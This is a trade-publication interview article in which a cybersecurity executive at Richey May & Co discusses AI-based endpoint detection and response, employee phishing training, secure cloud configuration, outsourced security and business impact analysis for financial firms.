Proactively detecting threats through AI

John-Thomas Gaietto, Richey May & Co

Artificial intelligence is enabling organisations to be more proactive in their approach to cyber threats. Work environments with greater levels of remote access could be deemed more vulnerable, but the element of automation in identifying and remediating potentially malicious behaviour provides a superior measure of security.

A key development in the realm of cybersecurity has been the creation of end-point detection and response or EDR.

John-Thomas Gaietto, executive director of Cybersecurity Services at Richey May & Co discusses this progress and the benefits it brings firms: “The general basis of the tool is that, unlike traditional malware software that requires definition files to function and detect threats, this solution utilises machine learning and behavioural analysis to detect malicious behaviour.

“This technology enables organisations to detect threats earlier. Further, these tools have a lot of security automation built in. So not only can you detect the threats sooner, but you can also respond and remediate near automatically. That really moves the needle for a lot of organisations.”

In debating the enhancements artificial intelligence has facilitated within cybersecurity, Gaietto refers to repeating patterns: “There are things that humans wouldn’t pick up on because of the volume of information they would need to analyse. AI allows organisations to identify anomalies and behaviours that would have been much more difficult to isolate without that automation.

AI and other automation can give a lending hand to organisations which do not have the budget for an around the clock security operation centre. “Instead of alerting a cybersecurity person and having to wait for them to check their phone, the tool can automatically take an action to stop the spread of any malicious behaviour. The system dictates the action taken when it detects certain type of behaviour,” Gaietto explains.

The industry talks about preventing zero-day attacks and in a world where large swathes of the workforce are operating from remote locations, this takes on greater significance. According to Gaietto, in addition to EDR tools, one of the crucial elements in protecting an organisation is frontline defence, especially when confronted with phishing attacks.

“The first protocol should always be education. Communicate with your employees, as they are your first line of defence. When writing your policies, don’t threaten to penalise people for stepping forward or reporting. You want to encourage them to do that. The companies that invested in training have seen the volume of frontline reporting increase dramatically. So that investment does pay off,” Gaietto advises.

Secure configuration

One of the things financial firms need to wary of is trying to take a traditional cybersecurity approach into the cloud. “You really have to understand the methodology on how to configure the cloud in a secure manner,” Gaietto says.

This is important because many of the major cloud providers work on what is called a shared responsibility model. This means they protect the physical security side of things. But the organisations themselves are then responsible for configuring the environment to protect their workloads and data.

Getting this right is crucial as it can make or break the solution and its deployment. According to Gaietto, in most of the headline stories outlining cloud breaches, the root cause is usually user error in configuring the solution they’ve adopted from the provider. “It is very rare that it’s a software vulnerability issue. Typically, it’s due to user error,” he says.

Partnerships and impact analyses

Gaietto goes on to outline the benefits of appointing a third-party partner to manage cybersecurity: “It’s simple economics; it’s about the demand and the cost. We’ve seen salaries of cybersecurity staff really skyrocket over the last two or three years, so often it doesn’t make sense for an organisation to have an in-house cybersecurity team which is not a hundred percent utilised a hundred percent of the time. A third-party provider, on the other hand, can provide the service to multiple clients at the cost of half or three quarters of one expert’s salary.”

Also, firms need to understand which areas of their business they should focus on when putting together their cybersecurity strategy. In order to determine which processes or areas of business are critical from a cybersecurity perspective, a firm should undertake a business impact analysis. This means talking to different stakeholders within the business to understand the processes and systems that are essential to their particular area of work.

“An exercise like this identifies business processes and how critical they are to the operation of the organisation. For example, in HR and payroll – if certain processes or systems are compromised, then employees run the risk of not getting paid. Therefore, in this case these are vital for the smooth running of an organisation. Following that, the organisation can map out its technology needs and understand which are the critical or vulnerable parts of its network. These will be the areas they should prioritise when putting together a resiliency programme or disaster recovery programme,” Gaietto recommends.

Strategic planning

This element of strategic planning is one Gaietto believes the industry should focus on: “The compliance side of business resilience is going to be vital going forward. Not many organisations have a defined plan going into the pandemic, and while they made it work, it was all a bit knee-jerk and done on impulse. We are really pushing hard on companies to have clear strategies in place to better protect customer information and things of that nature.”

Mapping out a clear path ahead is even more important in the current environment, given the uncertainty as a result of the Covid-19 pandemic.

“Most organisations are going to come under strain due to a lack of economic activity. Therefore, as budgets get leaner and there is less room for error, making efficient use of that budget is going to become even more important,” Gaietto notes.

He concludes by saying many firms still have a lot to accomplish when it comes to the adoption of automation, AI and machine learning: “This is going to play a huge role. It’s a trend that will continue, because it can be implemented without having a dramatic impact on a firm’s operating cost, which has considerable appeal at this particular point in time.” 


John-Thomas Gaietto
Executive Director of Cybersecurity Services, Richey May & Co

John-Thomas Gaietto, CISSP, has more than 22 years of experience providing enterprise information security and risk management services to a variety of organisations. His expertise includes the development of security strategies based on organisational risk, oversight of security operations, incident response, third-party risk management, disaster recovery, and building high-performing Information Security teams. His experience includes numerous compliance verticals, such as PCI-DSS, Sarbanes-Oxley, HIPAA, GLBA, FISMA, TPN, ISO, SOC, New York State Department of Financial Services Data Security and GDPR.

Author Profile